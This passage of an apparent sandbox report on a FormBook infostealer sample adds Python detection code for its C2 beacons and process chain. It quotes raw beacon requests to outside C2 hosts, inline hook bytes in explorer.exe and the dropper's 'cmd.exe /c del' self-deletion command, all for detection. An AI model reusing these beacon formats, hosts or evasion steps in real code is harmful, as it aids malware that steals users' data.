69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;

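The two requests above share everything that matters for detection: the same host process (explorer.exe, which is not a browser), plain HTTP on port 80, a header block consisting only of Host and Connection: close with no User-Agent, a GET to a short directory (/nyr/) carrying one long base64-like parameter and one short token that is identical across both C2 hosts (U4kp=NtxHhLZ8S6kT5jw), and seven NUL bytes after the header block. The Python below is an added example, not part of the Joe Sandbox report or of any FormBook tooling: it rebuilds those two requests from the page, scores each against that shape, and groups requests by the constant part of the URI so that the second C2 host is tied to the first. The host-process list, the regexes, the scoring threshold and the (process, destination, raw bytes) tuple layout are this example's own choices.

```python
import re
from typing import Any, Dict, List, Tuple

# Two outbound requests rebuilt from the capture on this page. Both came from
# C:\Windows\explorer.exe to port 80; the request line, the two headers and the
# seven trailing NUL bytes are as reported. The (process, destination, raw)
# tuple layout is constructed for this example.
CAPTURED: List[Tuple[str, str, bytes]] = [
    ("C:\\Windows\\explorer.exe", "23.227.38.74:80",
     b"GET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR"
     b"&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1\r\n"
     b"Host: www.maluss.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
    ("C:\\Windows\\explorer.exe", "198.185.159.144:80",
     b"GET /nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST"
     b"&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1\r\n"
     b"Host: www.exclusiveflooringcollection.com\r\nConnection: close\r\n\r\n" + b"\x00" * 7),
]

# Processes this report shows hosting the injected payload; neither is a
# browser, so plain HTTP from them is itself a signal (example's own list).
INJECTION_HOSTS = {"explorer.exe", "mstsc.exe"}
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,6}/$")            # e.g. /nyr/
LONG_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")    # base64-like payload
SHORT_ID = re.compile(r"^[A-Za-z0-9]{8,24}$")            # constant token
BEACON_THRESHOLD = 3                                     # example's own cutoff


def parse_request(raw: bytes) -> Dict[str, Any]:
    """Split a raw HTTP/1.1 request into method, path, query params,
    lower-cased headers and whatever bytes trail the header block."""
    head, _, trailer = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    # Split by hand: urllib.parse.parse_qsl would turn '+' into a space and
    # damage the base64-like value.
    params = [(k, v) for k, _, v in (kv.partition("=") for kv in query.split("&") if kv)]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params,
            "headers": headers, "trailer": trailer}


def score_request(process: str, raw: bytes) -> Tuple[int, List[str]]:
    """Count how many traits of the beacon shape on this page one request has."""
    req = parse_request(raw)
    reasons: List[str] = []
    image = process.rsplit("\\", 1)[-1].lower()
    if image in INJECTION_HOSTS:
        reasons.append(f"plain HTTP from {image}")
    hdrs = req["headers"]
    if set(hdrs) == {"host", "connection"} and "user-agent" not in hdrs:
        reasons.append("only Host/Connection headers, no User-Agent")
    params = req["params"]
    if (req["method"] == "GET" and SHORT_DIR.match(req["path"])
            and len(params) == 2
            and LONG_BLOB.match(params[0][1]) and SHORT_ID.match(params[1][1])):
        reasons.append("GET /<short dir>/?<blob>&<token> shape")
    trailer = req["trailer"]
    if trailer and trailer.strip(b"\x00") == b"":
        reasons.append(f"{len(trailer)} NUL bytes after the header block")
    return len(reasons), reasons


def is_beacon(process: str, raw: bytes) -> bool:
    return score_request(process, raw)[0] >= BEACON_THRESHOLD


def pivot_key(raw: bytes) -> Tuple[str, str]:
    """(path, second-parameter value): the part of the URI that stays fixed
    across C2 hosts for one infection, so it links the hosts together."""
    req = parse_request(raw)
    return req["path"], req["params"][1][1]


def group_by_pivot(captured: List[Tuple[str, str, bytes]]) -> Dict[Tuple[str, str], List[str]]:
    groups: Dict[Tuple[str, str], List[str]] = {}
    for _proc, dst, raw in captured:
        groups.setdefault(pivot_key(raw), []).append(dst)
    return groups


if __name__ == "__main__":
    for proc, dst, raw in CAPTURED:
        score, why = score_request(proc, raw)
        print(dst, score, "beacon" if is_beacon(proc, raw) else "benign", why)
    for key, hosts in group_by_pivot(CAPTURED).items():
        print("pivot", key, "->", hosts)
```

The pivot on (path, second parameter) is the useful part when the first C2 host is already dead: the DNS section shows www.magnumopuspro.com returned NXDOMAIN, yet the token in U4kp ties the later www.maluss.com and www.exclusiveflooringcollection.com requests to the same infection.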

                                        Code Manipulations

                                        User Modules

                                        Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEE
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEE
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEE

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:07:03:10
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:07:03:11
                                        Start date:04/05/2021
                                        Path:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x400000
                                        File size:235115 bytes
                                        MD5 hash:EEE5F618718BC8237BB9C7A48154CF1A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:07:03:16
                                        Start date:04/05/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:07:03:34
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\mstsc.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\mstsc.exe
                                        Imagebase:0xd20000
                                        File size:3444224 bytes
                                        MD5 hash:2412003BE253A515C620CE4890F3D8F3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:07:03:38
                                        Start date:04/05/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
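The System Behavior entries above form a chain that can be matched on endpoint telemetry without any hash: a lure-named executable starts a second copy of itself (the hollowed child, process 2 in the Yara sources), explorer.exe then hosts the payload, a 32-bit system binary (mstsc.exe) is started from SysWOW64 with a command line that is nothing but its own path, and cmd.exe /c del removes the original file. The Python below is an added example, not part of this report or of any vendor tooling: it encodes those entries as constructed process-creation events and runs four rules over them. The PIDs and parent-child links are assumptions made for the example (this excerpt lists the processes but not the tree; the links follow the usual FormBook order, and explorer.exe is treated as the pre-existing shell rather than a process the sample created, since its reported start time is when the injected code became active). The rule names and the lure-keyword list are also this example's own.

```python
import re
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\202139769574 Shipping Documents.exe"

# Process-creation events rebuilt from the System Behavior entries on this
# page: start times, image paths and command lines are as reported. PIDs and
# parent-child links are constructed for this example; explorer.exe is modelled
# as the pre-existing shell (ppid 0).
EVENTS: List[Dict[str, str]] = [
    dict(ts="07:03:10", pid="1", ppid="0", image=SAMPLE, cmdline=f"'{SAMPLE}'"),
    dict(ts="07:03:11", pid="2", ppid="1", image=SAMPLE, cmdline=f"'{SAMPLE}'"),
    dict(ts="07:03:16", pid="3", ppid="0", image=r"C:\Windows\explorer.exe", cmdline=""),
    dict(ts="07:03:34", pid="7", ppid="3", image=r"C:\Windows\SysWOW64\mstsc.exe",
         cmdline=r"C:\Windows\SysWOW64\mstsc.exe"),
    dict(ts="07:03:38", pid="8", ppid="7", image=r"C:\Windows\SysWOW64\cmd.exe",
         cmdline=f"/c del '{SAMPLE}'"),
    dict(ts="07:03:38", pid="9", ppid="8", image=r"C:\Windows\System32\conhost.exe",
         cmdline=r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Example's own lure pattern: a long digit run, a shipping/invoice style
# keyword, and an .exe extension (the report flags this name as suspicious).
LURE = re.compile(r"^\d{6,}.*\b(shipping|invoice|payment|order|document)s?\b.*\.exe$", re.I)
SYSWOW64 = "c:\\windows\\syswow64\\"
# "/c del 'path'" with or without quotes; the path is captured for lookup.
CMD_DEL = re.compile(r"/c\s+del\s+'?(?P<path>[^']+?)'?\s*$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def findings(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, pid) pairs for every event that trips one of four rules:
    lure_filename, self_spawn, explorer_spawns_bare_syswow64, self_delete."""
    by_pid = {e["pid"]: e for e in events}
    images = {e["image"].lower() for e in events}
    out: List[Tuple[str, str]] = []
    for e in events:
        img = e["image"].lower()
        name = basename(img)
        parent = by_pid.get(e["ppid"])
        # Rule 1: the file name itself is a social-engineering lure.
        if LURE.search(name):
            out.append(("lure_filename", e["pid"]))
        # Rule 2: a process starts a second copy of its own image, the
        # launch pattern of hollowing a suspended child of itself.
        if parent is not None and parent["image"].lower() == img:
            out.append(("self_spawn", e["pid"]))
        # Rule 3: the shell starts a 32-bit system binary from SysWOW64 with
        # no arguments at all, which interactive use of mstsc.exe never does.
        if (parent is not None and basename(parent["image"]) == "explorer.exe"
                and img.startswith(SYSWOW64)
                and e["cmdline"].strip().lower() == img):
            out.append(("explorer_spawns_bare_syswow64", e["pid"]))
        # Rule 4: cmd.exe deletes a file that is the image of a process seen
        # earlier in the same telemetry, i.e. the dropper removing itself.
        if name == "cmd.exe":
            m = CMD_DEL.search(e["cmdline"])
            if m and m.group("path").lower() in images:
                out.append(("self_delete", e["pid"]))
    return out


if __name__ == "__main__":
    for rule, pid in findings(EVENTS):
        print(f"{rule:32s} pid={pid} {EVENTS[[x['pid'] for x in EVENTS].index(pid)]['image']}")
```

Rule 4 is the one that holds up best across FormBook samples: the dropper path changes with every lure, but "cmd.exe /c del" of a path that matches an image seen earlier in the tree is unusual for anything but self-cleaning malware and uninstallers.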
